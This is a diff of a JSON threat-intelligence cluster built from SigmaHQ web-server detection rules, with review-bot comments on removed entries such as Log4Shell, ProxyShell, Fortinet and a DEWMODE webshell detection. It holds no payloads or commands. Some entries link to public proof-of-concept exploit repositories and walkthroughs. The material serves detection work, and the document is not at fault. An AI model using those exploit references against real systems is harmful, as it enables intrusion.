"description": "Detects source code enumeration that use GET requests by keyword searches in URL strings",
"meta": {
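Review bot: The Wazuh entry removed in this hunk (uuid b9888738…) tags both `cve.2021.21978` and `cve.2021.26814` although its filename, description and value refer only to CVE-2021-26814, and the MODx entry (uuid a4a899e8…) carries a description ending in a literal `\n` copied from the YAML block scalar; neither matters if the removal is intentional, but if these entries come back after the generator's source path is fixed, the stray CVE tag should be reported upstream and the generator should strip trailing newlines from multi-line descriptions. The hunk also removes two near-duplicate OWASSRF entries (`web_exchange_owassrf_poc_exploitation.yml` and `web_exchange_owassrf_exploitation.yml`) whose descriptions differ only in the "using publicly available POC" clause and the `level`; both are distinct upstream rules with their own uuids, so both should be tracked if restored.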
@@ -85504,8 +81462,8 @@
"logsource.category": "webserver",
"logsource.product": "No established product",
"refs": [
- "https://medium.com/@logicbomb_1/bugbounty-how-i-was-able-to-download-the-source-code-of-indias-largest-telecom-service-52cf5c5640a1",
"https://pentester.land/tutorials/2018/10/25/source-code-disclosure-via-exposed-git-folder.html",
+ "https://medium.com/@logicbomb_1/bugbounty-how-i-was-able-to-download-the-source-code-of-indias-largest-telecom-service-52cf5c5640a1",
"https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_source_code_enumeration.yml"
],
"tags": [
@@ -85525,217 +81483,6 @@
"uuid": "953d460b-f810-420a-97a2-cfca4c98e602",
"value": "Source Code Enumeration Detection by Keyword"
},
- {
- "description": "Detects the exploitation attempt of the vulnerability found in F5 BIG-IP and described in CVE-2020-5902",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2020/07/05",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "web_cve_2020_5902_f5_bigip.yml",
- "level": "critical",
- "logsource.category": "webserver",
- "logsource.product": "No established product",
- "refs": [
- "https://support.f5.com/csp/article/K52145254",
- "https://twitter.com/yorickkoster/status/1279709009151434754",
- "https://www.ptsecurity.com/ww-en/about/news/f5-fixes-critical-vulnerability-discovered-by-positive-technologies-in-big-ip-application-delivery-controller/",
- "https://www.criticalstart.com/f5-big-ip-remote-code-execution-exploit/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_cve_2020_5902_f5_bigip.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1190"
- ]
- },
- "related": [
- {
- "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "44b53b1c-e60f-4a7b-948e-3435a7918478",
- "value": "CVE-2020-5902 F5 BIG-IP Exploitation Attempt"
- },
- {
- "description": "Detects the exploitation of VSphere Remote Code Execution vulnerability as described in CVE-2021-21972",
- "meta": {
- "author": "Bhabesh Raj",
- "creation_date": "2021/02/24",
- "falsepositive": [
- "OVA uploads to your VSphere appliance"
- ],
- "filename": "web_cve_2021_21972_vsphere_unauth_rce_exploit.yml",
- "level": "high",
- "logsource.category": "webserver",
- "logsource.product": "No established product",
- "refs": [
- "https://swarm.ptsecurity.com/unauth-rce-vmware",
- "https://f5.pm/go-59627.html",
- "https://www.vmware.com/security/advisories/VMSA-2021-0002.html",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_cve_2021_21972_vsphere_unauth_rce_exploit.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1190"
- ]
- },
- "related": [
- {
- "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "179ed852-0f9b-4009-93a7-68475910fd86",
- "value": "CVE-2021-21972 VSphere Exploitation"
- },
- {
- "description": "Detects potential exploitation attempts that target the Cacti Command Injection CVE-2022-46169",
- "meta": {
- "author": "Nasreddine Bencherchali (Nextron Systems)",
- "creation_date": "2022/12/27",
- "falsepositive": [
- "Web vulnerability scanners"
- ],
- "filename": "web_cve_2022_46169_cacti_exploitation_attempt.yml",
- "level": "high",
- "logsource.category": "webserver",
- "logsource.product": "No established product",
- "refs": [
- "https://github.com/Cacti/cacti/security/advisories/GHSA-6p93-p743-35gf",
- "https://github.com/rapid7/metasploit-framework/pull/17407",
- "https://github.com/0xf4n9x/CVE-2022-46169",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_cve_2022_46169_cacti_exploitation_attempt.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1190",
- "cve.2022.46169"
- ]
- },
- "related": [
- {
- "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "738cb115-881f-4df3-82cc-56ab02fc5192",
- "value": "Potential CVE-2022-46169 Exploitation Attempt"
- },
- {
- "description": "Detects exploitation attempt against log4j RCE vulnerability reported as CVE-2021-44228 in different header fields found in web server logs (Log4Shell)",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2021/12/10",
- "falsepositive": [
- "Vulnerability scanning"
- ],
- "filename": "web_cve_2021_44228_log4j_fields.yml",
- "level": "high",
- "logsource.category": "webserver",
- "logsource.product": "No established product",
- "refs": [
- "https://github.com/tangxiaofeng7/apache-log4j-poc",
- "https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b",
- "https://github.com/YfryTchsGD/Log4jAttackSurface",
- "https://www.lunasec.io/docs/blog/log4j-zero-day/",
- "https://twitter.com/shutingrz/status/1469255861394866177?s=21",
- "https://news.ycombinator.com/item?id=29504755",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_cve_2021_44228_log4j_fields.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1190"
- ]
- },
- "related": [
- {
- "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "9be472ed-893c-4ec0-94da-312d2765f654",
- "value": "Log4j RCE CVE-2021-44228 in Fields"
- },
- {
- "description": "Detects access to DEWMODE webshell as described in FIREEYE report",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2021/02/22",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "web_unc2546_dewmode_php_webshell.yml",
- "level": "high",
- "logsource.category": "webserver",
- "logsource.product": "No established product",
- "refs": [
- "https://www.fireeye.com/blog/threat-research/2021/02/accellion-fta-exploited-for-data-theft-and-extortion.html",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_unc2546_dewmode_php_webshell.yml"
- ],
- "tags": [
- "attack.persistence",
- "attack.t1505.003"
- ]
- },
- "related": [
- {
- "dest-uuid": "5d0d3609-d06d-49e1-b9c9-b544e0c618cb",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "fdf96c90-42d5-4406-8a9c-14a2c9a016b5",
- "value": "DEWMODE Webshell Access"
- },
- {
- "description": "Detects CVE-2019-11510 exploitation attempt - URI contains Guacamole",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2019/11/18",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "web_cve_2019_11510_pulsesecure_exploit.yml",
- "level": "critical",
- "logsource.category": "webserver",
- "logsource.product": "No established product",
- "refs": [
- "https://www.exploit-db.com/exploits/47297",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_cve_2019_11510_pulsesecure_exploit.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1190"
- ]
- },
- "related": [
- {
- "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "2dbc10d7-a797-49a8-8776-49efa6442e60",
- "value": "Pulse Secure Attack CVE-2019-11510"
- },
{
"description": "Detects possible Java payloads in web access logs",
"meta": {
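Review bot: The removals in this hunk include the Log4Shell header-field rule (`web_cve_2021_44228_log4j_fields.yml`, uuid 9be472ed…) and the DEWMODE webshell rule (uuid fdf96c90…), which is a persistence detection tagged `attack.t1505.003` with its own `related` link to 5d0d3609…, not a CVE rule at all; losing a detection this widely deployed in a routine sync is a strong sign that the generator's input set changed rather than that upstream retired the rule, so compare the element count delta in the README against the number of rules actually deleted in SigmaHQ before merging.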
@@ -85749,11 +81496,11 @@
"logsource.category": "webserver",
"logsource.product": "No established product",
"refs": [
- "https://medium.com/geekculture/text4shell-exploit-walkthrough-ebc02a01f035",
"https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/",
- "https://twitter.com/httpvoid0x2f/status/1532924261035384832",
- "https://github.com/httpvoid/writeups/blob/62d3751945289d088ccfdf4d0ffbf61598a2cd7d/Confluence-RCE.md",
"https://www.rapid7.com/blog/post/2021/09/02/active-exploitation-of-confluence-server-cve-2021-26084/",
+ "https://twitter.com/httpvoid0x2f/status/1532924261035384832",
+ "https://medium.com/geekculture/text4shell-exploit-walkthrough-ebc02a01f035",
+ "https://github.com/httpvoid/writeups/blob/62d3751945289d088ccfdf4d0ffbf61598a2cd7d/Confluence-RCE.md",
"https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_java_payload_in_access_logs.yml"
],
"tags": [
@@ -85764,39 +81511,6 @@
"uuid": "583aa0a2-30b1-4d62-8bf3-ab73689efe6c",
"value": "Java Payload Strings"
},
- {
- "description": "Detects successful exploitation of Exchange vulnerability as reported in CVE-2021-28480",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2021/05/14",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "web_cve_2021_28480_exchange_exploit.yml",
- "level": "critical",
- "logsource.category": "webserver",
- "logsource.product": "No established product",
- "refs": [
- "https://twitter.com/GossiTheDog/status/1392965209132871683?s=20",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_cve_2021_28480_exchange_exploit.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1190"
- ]
- },
- "related": [
- {
- "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "a2a9d722-0acb-4096-bccc-daaf91a5037b",
- "value": "Exchange Exploitation CVE-2021-28480"
- },
{
"description": "Detects XSS attempts injected via GET requests in access logs",
"meta": {
@@ -85821,41 +81535,6 @@
"uuid": "65354b83-a2ea-4ea6-8414-3ab38be0d409",
"value": "Cross Site Scripting Strings"
},
- {
- "description": "Detects the exploitation of the WebLogic server vulnerability described in CVE-2021-2109",
- "meta": {
- "author": "Bhabesh Raj",
- "creation_date": "2021/01/20",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "web_cve_2021_2109_weblogic_rce_exploit.yml",
- "level": "critical",
- "logsource.category": "webserver",
- "logsource.product": "No established product",
- "refs": [
- "https://mp.weixin.qq.com/s/wX9TMXl1KVWwB_k6EZOklw",
- "https://twitter.com/pyn3rd/status/1351696768065409026",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_cve_2021_2109_weblogic_rce_exploit.yml"
- ],
- "tags": [
- "attack.t1190",
- "attack.initial_access",
- "cve.2021.2109"
- ]
- },
- "related": [
- {
- "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "687f6504-7f44-4549-91fc-f07bab065821",
- "value": "Oracle WebLogic Exploit CVE-2021-2109"
- },
{
"description": "Detects path traversal exploitation attempts",
"meta": {
@@ -85890,76 +81569,6 @@
"uuid": "7745c2ea-24a5-4290-b680-04359cb84b35",
"value": "Path Traversal Exploitation Attempts"
},
- {
- "description": "Detects exploitation attempts of Sitecore Experience Platform Pre-Auth RCE CVE-2021-42237 found in Report.ashx",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2021/11/17",
- "falsepositive": [
- "Vulnerability Scanning"
- ],
- "filename": "web_cve_2021_42237_sitecore_report_ashx.yml",
- "level": "high",
- "logsource.category": "webserver",
- "logsource.product": "No established product",
- "refs": [
- "https://blog.assetnote.io/2021/11/02/sitecore-rce/",
- "https://support.sitecore.com/kb?id=kb_article_view&sysparm_article=KB1000776",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_cve_2021_42237_sitecore_report_ashx.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1190"
- ]
- },
- "related": [
- {
- "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "20c6ed1c-f7f0-4ea3-aa65-4f198e6acb0f",
- "value": "Sitecore Pre-Auth RCE CVE-2021-42237"
- },
- {
- "description": "Detects attempts to exploit an apache spark server via CVE-2014-6287 from a weblogs perspective",
- "meta": {
- "author": "Nasreddine Bencherchali (Nextron Systems)",
- "creation_date": "2022/07/19",
- "falsepositive": [
- "Web vulnerability scanners"
- ],
- "filename": "web_cve_2022_33891_spark_shell_command_injection.yml",
- "level": "high",
- "logsource.category": "webserver",
- "logsource.product": "No established product",
- "refs": [
- "https://github.com/W01fh4cker/cve-2022-33891/blob/fd973b56e78bca8822caa3a2e3cf1b5aff5d0950/cve_2022_33891_poc.py",
- "https://sumsec.me/2022/CVE-2022-33891%20Apache%20Spark%20shell%20command%20injection.html",
- "https://github.com/apache/spark/pull/36315/files",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_cve_2022_33891_spark_shell_command_injection.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1190",
- "cve.2022.33891"
- ]
- },
- "related": [
- {
- "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "1a9a04fd-02d1-465c-abad-d733fd409f9c",
- "value": "Apache Spark Shell Command Injection - Weblogs"
- },
{
"description": "Detects known suspicious (default) user-agents related to scanning/recon tools",
"meta": {
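Review bot: The Apache Spark entry removed here (uuid 1a9a04fd…) has a description naming CVE-2014-6287 while its filename, `cve.2022.33891` tag and value all refer to CVE-2022-33891; that is an upstream inconsistency in the rule's description field and worth a fix in SigmaHQ regardless of whether the entry stays in this cluster. The Sitecore CVE-2021-42237 entry removed alongside it is consistent across its fields.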
@@ -85973,9 +81582,9 @@
"logsource.category": "webserver",
"logsource.product": "No established product",
"refs": [
+ "https://github.com/xmendez/wfuzz/blob/1b695ee9a87d66a7d7bf6cae70d60a33fae51541/docs/user/basicusage.rst",
"https://github.com/wpscanteam/wpscan/blob/196fbab5b1ce3870a43515153d4f07878a89d410/lib/wpscan/browser.rb",
"https://github.com/lanmaster53/recon-ng/blob/9e907dfe09fce2997f0301d746796408e01a60b7/recon/core/base.py#L92",
- "https://github.com/xmendez/wfuzz/blob/1b695ee9a87d66a7d7bf6cae70d60a33fae51541/docs/user/basicusage.rst",
"https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_susp_useragents.yml"
],
"tags": [
@@ -85995,166 +81604,6 @@
"uuid": "19aa4f58-94ca-45ff-bc34-92e533c0994a",
"value": "Suspicious User-Agents Related To Recon Tools"
},
- {
- "description": "Detects possible exploitation of VMware Workspace ONE Access Admin Remote Code Execution vulnerability as described in CVE-2022-31659",
- "meta": {
- "author": "Nasreddine Bencherchali (Nextron Systems)",
- "creation_date": "2022/08/12",
- "falsepositive": [
- "Vulnerability scanners",
- "Legitimate access to the URI"
- ],
- "filename": "web_cve_2022_31659_vmware_rce.yml",
- "level": "medium",
- "logsource.category": "webserver",
- "logsource.product": "No established product",
- "refs": [
- "https://petrusviet.medium.com/dancing-on-the-architecture-of-vmware-workspace-one-access-eng-ad592ae1b6dd",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_cve_2022_31659_vmware_rce.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1190"
- ]
- },
- "related": [
- {
- "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "efdb2003-a922-48aa-8f37-8b80021a9706",
- "value": "CVE-2022-31659 VMware Workspace ONE Access RCE"
- },
- {
- "description": "Detects CVE-2018-13379 exploitation attempt against Fortinet SSL VPNs",
- "meta": {
- "author": "Bhabesh Raj",
- "creation_date": "2020/12/08",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "web_cve_2018_13379_fortinet_preauth_read_exploit.yml",
- "level": "critical",
- "logsource.category": "webserver",
- "logsource.product": "No established product",
- "refs": [
- "https://devco.re/blog/2019/08/09/attacking-ssl-vpn-part-2-breaking-the-Fortigate-ssl-vpn/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_cve_2018_13379_fortinet_preauth_read_exploit.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1190"
- ]
- },
- "related": [
- {
- "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "a2e97350-4285-43f2-a63f-d0daff291738",
- "value": "Fortinet CVE-2018-13379 Exploitation"
- },
- {
- "description": "Detects CVE-2021-22123 exploitation attempt against Fortinet WAFs",
- "meta": {
- "author": "Bhabesh Raj, Florian Roth",
- "creation_date": "2021/08/19",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "web_cve_2021_22123_fortinet_exploit.yml",
- "level": "critical",
- "logsource.category": "webserver",
- "logsource.product": "No established product",
- "refs": [
- "https://www.rapid7.com/blog/post/2021/08/17/fortinet-fortiweb-os-command-injection",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_cve_2021_22123_fortinet_exploit.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1190"
- ]
- },
- "related": [
- {
- "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "f425637f-891c-4191-a6c4-3bb1b70513b4",
- "value": "Fortinet CVE-2021-22123 Exploitation"
- },
- {
- "description": "Detects URL patterns that could be found in ProxyShell exploitation attempts against Exchange servers (failed and successful)",
- "meta": {
- "author": "Florian Roth (Nextron Systems), Rich Warren",
- "creation_date": "2021/08/07",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "web_exchange_proxyshell.yml",
- "level": "high",
- "logsource.category": "webserver",
- "logsource.product": "No established product",
- "refs": [
- "https://youtu.be/5mqid-7zp8k?t=2231",
- "https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html",
- "https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_exchange_proxyshell.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1190"
- ]
- },
- "related": [
- {
- "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "23eee45e-933b-49f9-ae1b-df706d2d52ef",
- "value": "Exchange ProxyShell Pattern"
- },
- {
- "description": "Detects URP patterns and status codes that indicate a successful ProxyShell exploitation attack against Exchange servers",
- "meta": {
- "author": "Florian Roth (Nextron Systems), Rich Warren",
- "creation_date": "2021/08/09",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "web_exchange_proxyshell_successful.yml",
- "level": "critical",
- "logsource.category": "webserver",
- "logsource.product": "No established product",
- "refs": [
- "https://youtu.be/5mqid-7zp8k?t=2231",
- "https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html",
- "https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_exchange_proxyshell_successful.yml"
- ],
- "tags": [
- "attack.initial_access"
- ]
- },
- "uuid": "992be1eb-e5da-437e-9a54-6d13b57bb4d8",
- "value": "Successful Exchange ProxyShell Attack"
- },
{
"description": "Certain strings in the uri_query field when combined with null referer and null user agent can indicate activity associated with the webshell ReGeorg.",
"meta": {
@@ -86168,8 +81617,8 @@
"logsource.category": "webserver",
"logsource.product": "No established product",
"refs": [
- "https://github.com/sensepost/reGeorg",
"https://community.rsa.com/community/products/netwitness/blog/2019/02/19/web-shells-and-netwitness-part-3",
+ "https://github.com/sensepost/reGeorg",
"https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_webshell_regeorg.yml"
],
"tags": [
@@ -86189,403 +81638,6 @@
"uuid": "2ea44a60-cfda-11ea-87d0-0242ac130003",
"value": "Webshell ReGeorg Detection Via Web Logs"
},
- {
- "description": "Detects exploitation attempt against log4j RCE vulnerability reported as CVE-2021-44228 (Log4Shell)",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2021/12/10",
- "falsepositive": [
- "Vulnerability scanning"
- ],
- "filename": "web_cve_2021_44228_log4j.yml",
- "level": "high",
- "logsource.category": "webserver",
- "logsource.product": "No established product",
- "refs": [
- "https://github.com/tangxiaofeng7/apache-log4j-poc",
- "https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b",
- "https://github.com/YfryTchsGD/Log4jAttackSurface",
- "https://www.lunasec.io/docs/blog/log4j-zero-day/",
- "https://twitter.com/shutingrz/status/1469255861394866177?s=21",
- "https://news.ycombinator.com/item?id=29504755",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_cve_2021_44228_log4j.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1190"
- ]
- },
- "related": [
- {
- "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "5ea8faa8-db8b-45be-89b0-151b84c82702",
- "value": "Log4j RCE CVE-2021-44228 Generic"
- },
- {
- "description": "Detects potential exploitation attempts that target the Centos Web Panel 7 Unauthenticated Remote Code Execution CVE-2022-44877",
- "meta": {
- "author": "Nasreddine Bencherchali (Nextron Systems)",
- "creation_date": "2023/01/20",
- "falsepositive": [
- "Web vulnerability scanners"
- ],
- "filename": "web_cve_2022_44877_exploitation_attempt.yml",
- "level": "high",
- "logsource.category": "webserver",
- "logsource.product": "No established product",
- "refs": [
- "https://seclists.org/fulldisclosure/2023/Jan/1",
- "https://www.rapid7.com/blog/post/2023/01/19/etr-exploitation-of-control-web-panel-cve-2022-44877/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_cve_2022_44877_exploitation_attempt.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1190",
- "cve.2022.44877"
- ]
- },
- "related": [
- {
- "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "1b2eeb27-949b-4704-8bfa-d8e5cfa045a1",
- "value": "Potential Centos Web Panel Exploitation Attempt - CVE-2022-44877"
- },
- {
- "description": "Detects the exploitation of the Confluence vulnerability described in CVE-2019-3398",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2020/05/26",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "web_cve_2019_3398_confluence.yml",
- "level": "critical",
- "logsource.category": "webserver",
- "logsource.product": "No established product",
- "refs": [
- "https://devcentral.f5.com/s/articles/confluence-arbitrary-file-write-via-path-traversal-cve-2019-3398-34181",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_cve_2019_3398_confluence.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1190"
- ]
- },
- "related": [
- {
- "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "e9bc39ae-978a-4e49-91ab-5bd481fc668b",
- "value": "Confluence Exploitation CVE-2019-3398"
- },
- {
- "description": "Detects the exploitation of Microsoft Exchange ProxyToken vulnerability as described in CVE-2021-33766",
- "meta": {
- "author": "Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Christian Burkard (Nextron Systems)",
- "creation_date": "2021/08/30",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "web_cve_2021_33766_msexchange_proxytoken.yml",
- "level": "critical",
- "logsource.category": "webserver",
- "logsource.product": "No established product",
- "refs": [
- "https://www.zerodayinitiative.com/blog/2021/8/30/proxytoken-an-authentication-bypass-in-microsoft-exchange-server",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_cve_2021_33766_msexchange_proxytoken.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1190"
- ]
- },
- "related": [
- {
- "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "56973b50-3382-4b56-bdf5-f51a3183797a",
- "value": "CVE-2021-33766 Exchange ProxyToken Exploitation"
- },
- {
- "description": "Detects exploitation of vulnerabilities in Arcadyan routers as reported in CVE-2021-20090 and CVE-2021-20091.",
- "meta": {
- "author": "Bhabesh Raj",
- "creation_date": "2021/08/24",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "web_cve_2021_20090_2021_20091_arcadyan_router_exploit.yml",
- "level": "critical",
- "logsource.category": "webserver",
- "logsource.product": "No established product",
- "refs": [
- "https://blogs.juniper.net/en-us/security/freshly-disclosed-vulnerability-cve-2021-20090-exploited-in-the-wild",
- "https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2",
- "https://www.tenable.com/security/research/tra-2021-13",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_cve_2021_20090_2021_20091_arcadyan_router_exploit.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1190",
- "cve.2021.20090",
- "cve.2021.20091"
- ]
- },
- "related": [
- {
- "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "f0500377-bc70-425d-ac8c-e956cd906871",
- "value": "Arcadyan Router Exploitations"
- },
- {
- "description": "Detects the exploitation of the TerraMaster TOS vulnerability described in CVE-2020-28188",
- "meta": {
- "author": "Bhabesh Raj",
- "creation_date": "2021/01/25",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "web_cve_2020_28188_terramaster_rce_exploit.yml",
- "level": "high",
- "logsource.category": "webserver",
- "logsource.product": "No established product",
- "refs": [
- "https://research.checkpoint.com/2021/freakout-leveraging-newest-vulnerabilities-for-creating-a-botnet/",
- "https://www.ihteam.net/advisory/terramaster-tos-multiple-vulnerabilities/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_cve_2020_28188_terramaster_rce_exploit.yml"
- ],
- "tags": [
- "attack.t1190",
- "attack.initial_access",
- "cve.2020.28188"
- ]
- },
- "related": [
- {
- "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "15c312b9-00d0-4feb-8870-7d940a4bdc5e",
- "value": "TerraMaster TOS CVE-2020-28188"
- },
- {
- "description": "Detects CVE-2020-10148 SolarWinds Orion API authentication bypass attempts",
- "meta": {
- "author": "Bhabesh Raj, Tim Shelton",
- "creation_date": "2020/12/27",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "web_cve_2020_10148_solarwinds_exploit.yml",
- "level": "critical",
- "logsource.category": "webserver",
- "logsource.product": "No established product",
- "refs": [
- "https://kb.cert.org/vuls/id/843464",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_cve_2020_10148_solarwinds_exploit.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1190"
- ]
- },
- "related": [
- {
- "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "5a35116f-43bc-4901-b62d-ef131f42a9af",
- "value": "CVE-2020-10148 SolarWinds Orion API Auth Bypass"
- },
- {
- "description": "Detects potential exploitation attempts of CVE-2022-21587 an arbitrary file upload vulnerability impacting Oracle E-Business Suite (EBS). CVE-2022-21587 can lead to unauthenticated remote code execution.",
- "meta": {
- "author": "Isa Almannaei",
- "creation_date": "2023/02/13",
- "falsepositive": [
- "Vulnerability Scanners"
- ],
- "filename": "web_cve_2022_21587_oracle_ebs.yml",
- "level": "high",
- "logsource.category": "webserver",
- "logsource.product": "No established product",
- "refs": [
